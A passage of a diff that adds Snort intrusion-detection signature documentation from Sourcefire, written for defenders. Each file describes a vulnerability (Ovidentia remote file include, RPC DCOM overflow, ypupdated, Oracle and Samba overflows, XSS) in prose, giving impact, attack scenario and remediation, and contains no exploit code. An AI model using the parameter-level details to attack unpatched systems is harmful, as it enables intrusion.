+with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck91.html
+Action:
+
+--
--- /dev/null
+++ b/doc/signatures/100000390.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000390
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "vacadmb.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "vacadmb.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2089.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2089
+
+--
+Summary:
+vulnerability in the rcp service ypupdated.
+
+--
+Impact:
+Information disclosure and possible code execution.
+
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The ypupdated service is used in conjunction with NIS servers to 
+remotely update changes made in NIS databases.
+
+On recieving a request the yupdated service executes a make command 
+using the Bourne shell. It is possible to execute code using 
+metacharacters in the request.
+
+Commands and code after the metacharacters in the request will be 
+executed with the privileges of the super user on the vulnerable system.
+
+--
+Affected Systems:
+	HP-UX 10.1, 10.10 and 10.20
+	
+	IBM AIX 3.2 and 4.1
+	
+	NEC EWS-UX/V (Rel4.2MP), (Rel4.2)
+	NEC UP-UX/V (Rel4.2MP)
+	NEC UX/4800 (64)
+	
+	SGI IRIX 3.2, 3.3, 3.3.1, 3.3.2, 3.3.3
+	SGI IRIX 4.0, 4.0.1 T, 4.0.1,4.0.2, 4.0.3, 4.0.4 T, 4.0.4 B, 4.0.4, 4.0.5 IPR, 4.0.5 H, 4.0.5 G, 4.0.5 F, 4.0.5 E, 4.0.5 D, 4.0.5 A, 4.0.5 (IOP), 4.0.5
+	SGI IRIX 5.0, 5.0.1, 5.1, 5.1.1, 5.2, 5.3 XFS, 5.3
+	SGI IRIX 6.0, 6.0.1 XFS, 6.0.1
+	
+	Sun SunOS 4.1 PSR_A, 4.1, 4.1.1, 4.1.2, 4.1.3 c, 4.1.3 _U1, 4.1.3, 4.1.4 -JL, 4.1.4
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypupdated service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypupdated daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1749
+
+--
--- /dev/null
+++ b/doc/signatures/3162.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3162
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1430.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1430
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerabilty on a Sun Solaris system.
+
+--
+Impact:
+Remote root access.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in /bin/login when used by telnetd on Sun Solaris sytems.
+A buffer overflow condition is present in /bin/login used by telnetd
+that may present an attacker with the opportunity to execute code of
+their choosing after a sucessful exploit.
+
+--
+Affected Systems:
+	Sun Solaris 8.x and earlier
+
+--
+Attack Scenarios:
+An attacker may utilize one of the available exploit scripts.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Consider using Secure Shell instead of telnet.
+
+Block inbound telnet access if it is not required.
+
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1732.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1732
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rwalld is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rwalld is using.  Attackers can also learn what versions of the rwalld protocol are accepted by rwalld. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rwalld run.  The rwalld RPC service is used by UNIX hosts to send a message to current users on the host.  There is a format string vulnerability associated with rwalld error messages, allowing an attacker to execute abitrary code with the privileges of rwalld, possibly root. According to CERT, this is both a local and remote exploit, but the remote exploit is more difficult to perform.
+
+--
+Affected Systems:
+Sun Solaris 2.5.1, 2.6, 7, and 8
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rwalld runs.  This may be a precursor to an attack to exploit the rwalld format string vulnerability.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rwalld, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rwalld, not probes of the rwalld service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rwalld service itself. An attacker may attempt to go directly to the rwalld port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-10.html
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000409.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000409
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "AssoCIateD" application running on a webserver. Access to the file "gallery_functions.php" using a remote file being passed as the "root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root_path" parameter in the "gallery_functions.php" script used by the "AssoCIateD" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using AssoCIateD
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2893.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2893
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_raw
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1949.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+1949
+
+--
+Summary:
+This event is generated when an attempt is made to register a Remote Procedure Call (RPC) program to the portmapper.  RPC is a facility that enables a machine to request a service from another remote machine. This is done without the need for detailed network information. Some versions of RPC have a vulnerability that allows a remote host to register applications from a spoofed source. 
+
+ -- 
+Impact:
+Attempted remote access.  This may be an attempt to maliciously register a program with the portmapper.
+
+--
+Detailed Information:
+Certain versions of rpcbind portmapper contain a flaw that can allow an attacker capable of spoofing TCP packets to register arbitrary RPC programs. It is possible for the attacker to gain root access depending on the RPC service registered.  
+
+-- 
+Affected Systems: 
+All machines running vulnerable RPC services.
+
+--
+Attack Scenarios:
+The attacker could potentially spoof TCP packets using pmap_set to register an RPC service. 
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule writer Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+
+--
--- /dev/null
+++ b/doc/signatures/616.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+616
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1702.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1702
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1792.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+1792
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Mnews.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A buffer overflow condition exists in Mnews, an NNTP and mail client.
+The overflow can be caused by a server sending enough data with a 200
+response to overwrite stack memory and so present the attacker with the
+oppotunity to execute code of their choosing.
+
+--
+Affected Systems:
+	FreeBSD 4.1
+	FreeBSD 4.2
+	FreeBSD 4.3
+	FreeBSD 4.4
+	FreeBSD 4.5
+
+--
+Attack Scenarios:
+The attacker needs to send enough extra data with the 200 response from
+a server to cause the overflow.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0909
+
+Bugtraq:
+http://www.securityfocus.com/bid/4900
+
+--
--- /dev/null
+++ b/doc/signatures/3225.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3225
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/552.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+552
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This may be against corporate policy. p2p clients connect to other p2p clients to share files, commonly music and video files but can be configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to transfer company confidential information to unauthorized hosts external to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+
+--
--- /dev/null
+++ b/doc/signatures/2851.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2851
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_snapshot_repobject
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1556.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1556
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1754.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1754
+
+--
+Summary:
+This event is generated when an attempt is made to access the as_web4.exe component associated with the askSam Web Publisher software.
+
+--
+Impact:
+Cross-site scripting.  This may allow execution of arbitrary commands on a victim host that visits the vulnerable server.
+
+--
+Detailed Information:
+
+askSam Web Publisher is a product that allows the creation and publication of documents and databases on the Internet.  A vulnerability exists in the as_web.exe or as_web4.exe component that may allow cross-site scripting because of a failure to filter script and HTML when error messages are returned.  This may allow an attacker to execute arbitrary code on the victim host that visits the vulnerable server.
+
+--
+Affected Systems:
+askSam Web Publisher 4.0
+
+--
+Attack Scenarios:
+An attacker can inject malicious code in vulnerable askSam input fields that use as_web.exe or as_web4.exe. The may allow execution of arbitrary code on a victim host that visits the vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+This alert will trigger on any access to the as_web4.exe module.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable scripting language support in your browser and e-mail client software to prevent becoming a victim host.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/4670
+
+--
--- /dev/null
+++ b/doc/signatures/3022.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3022
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1419.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+1419
+
+--
+
+Summary:
+This event is generated when an SNMP-Trap connection over UDP to an SNMP
+daemon is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+The SNMP (Simple Network Management Protocol) Trap daemon usually 
+listens on port 162, tcp or udp.
+
+An attacker may attempt to send this request to determine if a device is
+using SNMP.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons on well known ports.
+
+--
+
+Attack Scenarios:
+An attacker sends a packet directed to udp port 162, if sucessful a 
+reply is generated and the attacker may then launch further attacks 
+against the SNMP daemon.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Use a packet filtering firewall to protect devices using the SNMP 
+protocol and only allow connections from well-known hosts.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+
+
+--
--- /dev/null
+++ b/doc/signatures/3418.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3418
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000834.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000834
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Lazarus" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "show" parameter in the "codes-english.php" script used by the "Lazarus" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Lazarus
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2030.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2030
+
+--
+Summary:
+A user can change their password for Network Information Services (NIS) 
+using the ypasswd command. A vulnerability exists in ypasswd where
+an overly long username can cause a buffer overflow resulting in 
+unauthorized access to the remote machine.
+
+--
+Impact:
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
